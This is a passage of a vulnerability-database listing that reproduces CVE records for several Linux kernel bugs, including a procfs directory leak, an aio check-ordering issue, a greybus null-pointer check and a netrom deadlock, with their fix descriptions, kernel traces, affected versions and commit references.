words, it seems the\nreason for removing the proc directory on dev_release() was meant to cover\ncases in which a SCSI host structure was allocated, but the call to\nscsi_add_host() didn\u0027t happen. And that pattern happens to exist in some\nerror paths, for example.\n\nSyzkaller causes that by using USB raw gadget device, error\u0027ing on\nusb-storage driver, at usb_stor_probe2(). By checking that path, we can see\nthat the BadDevice label leads to a scsi_host_put() after a SCSI host\nallocation, but there\u0027s no call to scsi_add_host() in such path. That leads\nto messages like this in dmesg (and a leak of the SCSI host proc\nstructure):\n\nusb-storage 4-1:87.51: USB Mass Storage device detected\nproc_dir_entry \u0027scsi/usb-storage\u0027 already registered\nWARNING: CPU: 1 PID: 3519 at fs/proc/generic.c:377 proc_register+0x347/0x4e0 fs/proc/generic.c:376\n\nThe proper fix seems to still call scsi_proc_hostdir_rm() on dev_release(),\nbut guard that with the state check for SHOST_CREATED; there is even a\ncomment in scsi_host_dev_release() detailing that: such conditional is\nmeant for cases where the SCSI host was allocated but there was no calls to\n{add,remove}_host(), like the usb-storage case.\n\nThis is what we propose here and with that, the error path of usb-storage\ndoes not trigger the warning anymore."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:55:14.484Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/0053f15d50d50c9312d8ab9c11e2e405812dfcac"
},
{
"url": "https://git.kernel.org/stable/c/5c2386ba80e779a92ec3bb64ccadbedd88f779b1"
},
{
"url": "https://git.kernel.org/stable/c/cea234bb214b17d004dfdccce4491e6ff57c96ee"
},
{
"url": "https://git.kernel.org/stable/c/3678cf67ff7136db1dd3bf63c361650db5d92889"
},
{
"url": "https://git.kernel.org/stable/c/d4c34782b6d7b1e68d18d9549451b19433bd4c6c"
},
{
"url": "https://git.kernel.org/stable/c/e293c773c13b830cdc251f155df2254981abc320"
},
{
"url": "https://git.kernel.org/stable/c/f4ff08fab66eb5c0b97e1a24edac052fb40bf5d7"
},
{
"url": "https://git.kernel.org/stable/c/f23a4d6e07570826fe95023ca1aa96a011fa9f84"
}
],
"title": "scsi: core: Fix unremoved procfs host directory regression",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26935",
"datePublished": "2024-05-01T05:17:31.445Z",
"dateReserved": "2024-02-19T14:20:24.196Z",
"dateUpdated": "2025-05-04T12:55:14.484Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-35815 (GCVE-0-2024-35815)
Vulnerability from cvelistv5
Published
2024-05-17 13:23
Modified
2025-05-04 09:05
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
fs/aio: Check IOCB_AIO_RW before the struct aio_kiocb conversion
The first kiocb_set_cancel_fn() argument may point at a struct kiocb
that is not embedded inside struct aio_kiocb. With the current code,
depending on the compiler, the req->ki_ctx read happens either before
the IOCB_AIO_RW test or after that test. Move the req->ki_ctx read such
that it is guaranteed that the IOCB_AIO_RW test happens first.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 337b543e274fe7a8f47df3c8293cc6686ffa620f Version: b4eea7a05ee0ab5ab0514421e6ba8c5d249cf942 Version: ea1cd64d59f22d6d13f367d62ec6e27b9344695f Version: d7b6fa97ec894edd02f64b83e5e72e1aa352f353 Version: 18f614369def2a11a52f569fe0f910b199d13487 Version: e7e23fc5d5fe422827c9a43ecb579448f73876c7 Version: 1dc7d74fe456944a9b1c57bd776280249f441ac6 Version: b820de741ae48ccf50dd95e297889c286ff4f760 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-35815",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-20T14:12:56.685850Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:33:42.531Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:21:47.505Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/10ca82aff58434e122c7c757cf0497c335f993f3"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/396dbbc18963648e9d1a4edbb55cfe08fa374d50"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/94eb0293703ced580f05dfbe5a57da5931e9aee2"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a71cba07783abc76b547568b6452cd1dd9981410"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/18d5fc3c16cc317bd0e5f5dabe0660df415cadb7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c01ed748847fe8b810d86efc229b9e6c7fafa01e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5c43d0041e3a05c6c41c318b759fff16d2384596"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/961ebd120565cb60cebe21cb634fbc456022db4a"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/aio.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "10ca82aff58434e122c7c757cf0497c335f993f3",
"status": "affected",
"version": "337b543e274fe7a8f47df3c8293cc6686ffa620f",
"versionType": "git"
},
{
"lessThan": "396dbbc18963648e9d1a4edbb55cfe08fa374d50",
"status": "affected",
"version": "b4eea7a05ee0ab5ab0514421e6ba8c5d249cf942",
"versionType": "git"
},
{
"lessThan": "94eb0293703ced580f05dfbe5a57da5931e9aee2",
"status": "affected",
"version": "ea1cd64d59f22d6d13f367d62ec6e27b9344695f",
"versionType": "git"
},
{
"lessThan": "a71cba07783abc76b547568b6452cd1dd9981410",
"status": "affected",
"version": "d7b6fa97ec894edd02f64b83e5e72e1aa352f353",
"versionType": "git"
},
{
"lessThan": "18d5fc3c16cc317bd0e5f5dabe0660df415cadb7",
"status": "affected",
"version": "18f614369def2a11a52f569fe0f910b199d13487",
"versionType": "git"
},
{
"lessThan": "c01ed748847fe8b810d86efc229b9e6c7fafa01e",
"status": "affected",
"version": "e7e23fc5d5fe422827c9a43ecb579448f73876c7",
"versionType": "git"
},
{
"lessThan": "5c43d0041e3a05c6c41c318b759fff16d2384596",
"status": "affected",
"version": "1dc7d74fe456944a9b1c57bd776280249f441ac6",
"versionType": "git"
},
{
"lessThan": "961ebd120565cb60cebe21cb634fbc456022db4a",
"status": "affected",
"version": "b820de741ae48ccf50dd95e297889c286ff4f760",
"versionType": "git"
}
]
},
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/aio.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "4.19.312",
"status": "affected",
"version": "4.19.308",
"versionType": "semver"
},
{
"lessThan": "5.4.274",
"status": "affected",
"version": "5.4.270",
"versionType": "semver"
},
{
"lessThan": "5.10.215",
"status": "affected",
"version": "5.10.211",
"versionType": "semver"
},
{
"lessThan": "5.15.154",
"status": "affected",
"version": "5.15.150",
"versionType": "semver"
},
{
"lessThan": "6.1.84",
"status": "affected",
"version": "6.1.80",
"versionType": "semver"
},
{
"lessThan": "6.6.24",
"status": "affected",
"version": "6.6.19",
"versionType": "semver"
},
{
"lessThan": "6.7.12",
"status": "affected",
"version": "6.7.7",
"versionType": "semver"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.312",
"versionStartIncluding": "4.19.308",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.274",
"versionStartIncluding": "5.4.270",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"versionStartIncluding": "5.10.211",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.154",
"versionStartIncluding": "5.15.150",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.84",
"versionStartIncluding": "6.1.80",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.24",
"versionStartIncluding": "6.6.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.12",
"versionStartIncluding": "6.7.7",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nfs/aio: Check IOCB_AIO_RW before the struct aio_kiocb conversion\n\nThe first kiocb_set_cancel_fn() argument may point at a struct kiocb\nthat is not embedded inside struct aio_kiocb. With the current code,\ndepending on the compiler, the req-\u003eki_ctx read happens either before\nthe IOCB_AIO_RW test or after that test. Move the req-\u003eki_ctx read such\nthat it is guaranteed that the IOCB_AIO_RW test happens first."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:05:59.810Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/10ca82aff58434e122c7c757cf0497c335f993f3"
},
{
"url": "https://git.kernel.org/stable/c/396dbbc18963648e9d1a4edbb55cfe08fa374d50"
},
{
"url": "https://git.kernel.org/stable/c/94eb0293703ced580f05dfbe5a57da5931e9aee2"
},
{
"url": "https://git.kernel.org/stable/c/a71cba07783abc76b547568b6452cd1dd9981410"
},
{
"url": "https://git.kernel.org/stable/c/18d5fc3c16cc317bd0e5f5dabe0660df415cadb7"
},
{
"url": "https://git.kernel.org/stable/c/c01ed748847fe8b810d86efc229b9e6c7fafa01e"
},
{
"url": "https://git.kernel.org/stable/c/5c43d0041e3a05c6c41c318b759fff16d2384596"
},
{
"url": "https://git.kernel.org/stable/c/961ebd120565cb60cebe21cb634fbc456022db4a"
}
],
"title": "fs/aio: Check IOCB_AIO_RW before the struct aio_kiocb conversion",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-35815",
"datePublished": "2024-05-17T13:23:20.326Z",
"dateReserved": "2024-05-17T12:19:12.343Z",
"dateUpdated": "2025-05-04T09:05:59.810Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-38637 (GCVE-0-2024-38637)
Vulnerability from cvelistv5
Published
2024-06-21 10:18
Modified
2025-11-04 17:21
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
greybus: lights: check return of get_channel_from_mode
If channel for the given node is not found we return null from
get_channel_from_mode. Make sure we validate the return pointer
before using it in two of the missing places.
This was originally reported in [0]:
Found by Linux Verification Center (linuxtesting.org) with SVACE.
[0] https://lore.kernel.org/all/20240301190425.120605-1-m.lobanov@rosalinux.ru
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 2870b52bae4c81823ffcb3ed2b0626fb39d64f48 Version: 2870b52bae4c81823ffcb3ed2b0626fb39d64f48 Version: 2870b52bae4c81823ffcb3ed2b0626fb39d64f48 Version: 2870b52bae4c81823ffcb3ed2b0626fb39d64f48 Version: 2870b52bae4c81823ffcb3ed2b0626fb39d64f48 Version: 2870b52bae4c81823ffcb3ed2b0626fb39d64f48 Version: 2870b52bae4c81823ffcb3ed2b0626fb39d64f48 Version: 2870b52bae4c81823ffcb3ed2b0626fb39d64f48 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2025-11-04T17:21:54.586Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8f4a76d477f0cc3c54d512f07f6f88c8e1c1e07b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e2c64246e5dc8c0d35ec41770b85e2b4cafdff21"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/eac10cf3a97ffd4b4deb0a29f57c118225a42850"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/330f6bcdcef03f70f81db5f2ed6747af656a09f2"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9b41a9b9c8be8c552f10633453fdb509e83b66f8"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/518e2c46b5dbce40b1aa0100001d03c3ceaa7d38"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/895cdd9aa9546523df839f9cc1488a0ecc1e0731"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a1ba19a1ae7cd1e324685ded4ab563e78fe68648"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-38637",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T17:08:59.285414Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:34:44.356Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/staging/greybus/light.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "8f4a76d477f0cc3c54d512f07f6f88c8e1c1e07b",
"status": "affected",
"version": "2870b52bae4c81823ffcb3ed2b0626fb39d64f48",
"versionType": "git"
},
{
"lessThan": "e2c64246e5dc8c0d35ec41770b85e2b4cafdff21",
"status": "affected",
"version": "2870b52bae4c81823ffcb3ed2b0626fb39d64f48",
"versionType": "git"
},
{
"lessThan": "eac10cf3a97ffd4b4deb0a29f57c118225a42850",
"status": "affected",
"version": "2870b52bae4c81823ffcb3ed2b0626fb39d64f48",
"versionType": "git"
},
{
"lessThan": "330f6bcdcef03f70f81db5f2ed6747af656a09f2",
"status": "affected",
"version": "2870b52bae4c81823ffcb3ed2b0626fb39d64f48",
"versionType": "git"
},
{
"lessThan": "9b41a9b9c8be8c552f10633453fdb509e83b66f8",
"status": "affected",
"version": "2870b52bae4c81823ffcb3ed2b0626fb39d64f48",
"versionType": "git"
},
{
"lessThan": "518e2c46b5dbce40b1aa0100001d03c3ceaa7d38",
"status": "affected",
"version": "2870b52bae4c81823ffcb3ed2b0626fb39d64f48",
"versionType": "git"
},
{
"lessThan": "895cdd9aa9546523df839f9cc1488a0ecc1e0731",
"status": "affected",
"version": "2870b52bae4c81823ffcb3ed2b0626fb39d64f48",
"versionType": "git"
},
{
"lessThan": "a1ba19a1ae7cd1e324685ded4ab563e78fe68648",
"status": "affected",
"version": "2870b52bae4c81823ffcb3ed2b0626fb39d64f48",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/staging/greybus/light.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.9"
},
{
"lessThan": "4.9",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.316",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.278",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.219",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.161",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.93",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.33",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.316",
"versionStartIncluding": "4.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.278",
"versionStartIncluding": "4.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.219",
"versionStartIncluding": "4.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.161",
"versionStartIncluding": "4.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.93",
"versionStartIncluding": "4.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.33",
"versionStartIncluding": "4.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.4",
"versionStartIncluding": "4.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "4.9",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ngreybus: lights: check return of get_channel_from_mode\n\nIf channel for the given node is not found we return null from\nget_channel_from_mode. Make sure we validate the return pointer\nbefore using it in two of the missing places.\n\nThis was originally reported in [0]:\nFound by Linux Verification Center (linuxtesting.org) with SVACE.\n\n[0] https://lore.kernel.org/all/20240301190425.120605-1-m.lobanov@rosalinux.ru"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:15:55.660Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/8f4a76d477f0cc3c54d512f07f6f88c8e1c1e07b"
},
{
"url": "https://git.kernel.org/stable/c/e2c64246e5dc8c0d35ec41770b85e2b4cafdff21"
},
{
"url": "https://git.kernel.org/stable/c/eac10cf3a97ffd4b4deb0a29f57c118225a42850"
},
{
"url": "https://git.kernel.org/stable/c/330f6bcdcef03f70f81db5f2ed6747af656a09f2"
},
{
"url": "https://git.kernel.org/stable/c/9b41a9b9c8be8c552f10633453fdb509e83b66f8"
},
{
"url": "https://git.kernel.org/stable/c/518e2c46b5dbce40b1aa0100001d03c3ceaa7d38"
},
{
"url": "https://git.kernel.org/stable/c/895cdd9aa9546523df839f9cc1488a0ecc1e0731"
},
{
"url": "https://git.kernel.org/stable/c/a1ba19a1ae7cd1e324685ded4ab563e78fe68648"
}
],
"title": "greybus: lights: check return of get_channel_from_mode",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-38637",
"datePublished": "2024-06-21T10:18:25.560Z",
"dateReserved": "2024-06-18T19:36:34.948Z",
"dateUpdated": "2025-11-04T17:21:54.586Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2024-38589 (GCVE-0-2024-38589)
Vulnerability from cvelistv5
Published
2024-06-19 13:45
Modified
2025-11-04 17:21
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
netrom: fix possible dead-lock in nr_rt_ioctl()
syzbot loves netrom, and found a possible deadlock in nr_rt_ioctl [1]
Make sure we always acquire nr_node_list_lock before nr_node_lock(nr_node)
[1]
WARNING: possible circular locking dependency detected
6.9.0-rc7-syzkaller-02147-g654de42f3fc6 #0 Not tainted
------------------------------------------------------
syz-executor350/5129 is trying to acquire lock:
ffff8880186e2070 (&nr_node->node_lock){+...}-{2:2}, at: spin_lock_bh include/linux/spinlock.h:356 [inline]
ffff8880186e2070 (&nr_node->node_lock){+...}-{2:2}, at: nr_node_lock include/net/netrom.h:152 [inline]
ffff8880186e2070 (&nr_node->node_lock){+...}-{2:2}, at: nr_dec_obs net/netrom/nr_route.c:464 [inline]
ffff8880186e2070 (&nr_node->node_lock){+...}-{2:2}, at: nr_rt_ioctl+0x1bb/0x1090 net/netrom/nr_route.c:697
but task is already holding lock:
ffffffff8f7053b8 (nr_node_list_lock){+...}-{2:2}, at: spin_lock_bh include/linux/spinlock.h:356 [inline]
ffffffff8f7053b8 (nr_node_list_lock){+...}-{2:2}, at: nr_dec_obs net/netrom/nr_route.c:462 [inline]
ffffffff8f7053b8 (nr_node_list_lock){+...}-{2:2}, at: nr_rt_ioctl+0x10a/0x1090 net/netrom/nr_route.c:697
which lock already depends on the new lock.
the existing dependency chain (in reverse order) is:
-> #1 (nr_node_list_lock){+...}-{2:2}:
lock_acquire+0x1ed/0x550 kernel/locking/lockdep.c:5754
__raw_spin_lock_bh include/linux/spinlock_api_smp.h:126 [inline]
_raw_spin_lock_bh+0x35/0x50 kernel/locking/spinlock.c:178
spin_lock_bh include/linux/spinlock.h:356 [inline]
nr_remove_node net/netrom/nr_route.c:299 [inline]
nr_del_node+0x4b4/0x820 net/netrom/nr_route.c:355
nr_rt_ioctl+0xa95/0x1090 net/netrom/nr_route.c:683
sock_do_ioctl+0x158/0x460 net/socket.c:1222
sock_ioctl+0x629/0x8e0 net/socket.c:1341
vfs_ioctl fs/ioctl.c:51 [inline]
__do_sys_ioctl fs/ioctl.c:904 [inline]
__se_sys_ioctl+0xfc/0x170 fs/ioctl.c:890
do_syscall_x64 arch/x86/entry/common.c:52 [inline]
do_syscall_64+0xf5/0x240 arch/x86/entry/common.c:83
entry_SYSCALL_64_after_hwframe+0x77/0x7f
-> #0 (&nr_node->node_lock){+...}-{2:2}:
check_prev_add kernel/locking/lockdep.c:3134 [inline]
check_prevs_add kernel/locking/lockdep.c:3253 [inline]
validate_chain+0x18cb/0x58e0 kernel/locking/lockdep.c:3869
__lock_acquire+0x1346/0x1fd0 kernel/locking/lockdep.c:5137
lock_acquire+0x1ed/0x550 kernel/locking/lockdep.c:5754
__raw_spin_lock_bh include/linux/spinlock_api_smp.h:126 [inline]
_raw_spin_lock_bh+0x35/0x50 kernel/locking/spinlock.c:178
spin_lock_bh include/linux/spinlock.h:356 [inline]
nr_node_lock include/net/netrom.h:152 [inline]
nr_dec_obs net/netrom/nr_route.c:464 [inline]
nr_rt_ioctl+0x1bb/0x1090 net/netrom/nr_route.c:697
sock_do_ioctl+0x158/0x460 net/socket.c:1222
sock_ioctl+0x629/0x8e0 net/socket.c:1341
vfs_ioctl fs/ioctl.c:51 [inline]
__do_sys_ioctl fs/ioctl.c:904 [inline]
__se_sys_ioctl+0xfc/0x170 fs/ioctl.c:890
do_syscall_x64 arch/x86/entry/common.c:52 [inline]
do_syscall_64+0xf5/0x240 arch/x86/entry/common.c:83
entry_SYSCALL_64_after_hwframe+0x77/0x7f
other info that might help us debug this:
Possible unsafe locking scenario:
CPU0 CPU1
---- ----
lock(nr_node_list_lock);
lock(&nr_node->node_lock);
lock(nr_node_list_lock);
lock(&nr_node->node_lock);
*** DEADLOCK ***
1 lock held by syz-executor350/5129:
#0: ffffffff8f7053b8 (nr_node_list_lock){+...}-{2:2}, at: spin_lock_bh include/linux/spinlock.h:356 [inline]
#0: ffffffff8f7053b8 (nr_node_list_lock){+...}-{2:2}, at: nr_dec_obs net/netrom/nr_route.c:462 [inline]
#0: ffffffff8f70
---truncated---
References
| URL | Tags | ||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2025-11-04T17:21:39.426Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b9d663fbf74290cb68fbc66ae4367bd56837ad1d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1fbfb483c1a290dce3f41f52d45cc46dd88b7691"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b117e5b4f27c2c9076561b6be450a9619f0b79de"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/421c50fa81836775bf0fd6ce0e57a6eb27af24d5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3db2fc45d1d2a6457f06ebdfd45b9820e5b5c2b7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f28bdc2ee5d9300cc77bd3d97b5b3cdd14960fd8"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5fb7e2a4335fc67d6952ad2a6613c46e0b05f7c5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5bc50a705cfac8f64ce51c95611c3dd0554ef9c3"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e03e7f20ebf7e1611d40d1fdc1bde900fd3335f6"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-38589",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T17:13:46.964501Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:34:54.971Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/netrom/nr_route.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "b9d663fbf74290cb68fbc66ae4367bd56837ad1d",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "1fbfb483c1a290dce3f41f52d45cc46dd88b7691",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "b117e5b4f27c2c9076561b6be450a9619f0b79de",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
